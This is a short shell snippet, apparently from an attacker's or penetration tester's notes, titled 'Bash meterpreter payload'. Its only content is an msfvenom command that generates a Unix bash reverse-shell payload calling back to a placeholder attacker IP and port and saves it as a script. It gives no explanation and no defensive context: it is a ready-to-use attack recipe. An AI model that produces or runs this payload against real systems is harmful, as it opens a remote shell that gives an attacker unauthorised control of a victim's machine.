# Bash meterpreter payload
#
msfvenom -p cmd/unix/reverse_bash \
	LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
	-f raw -o ${NAME}.sh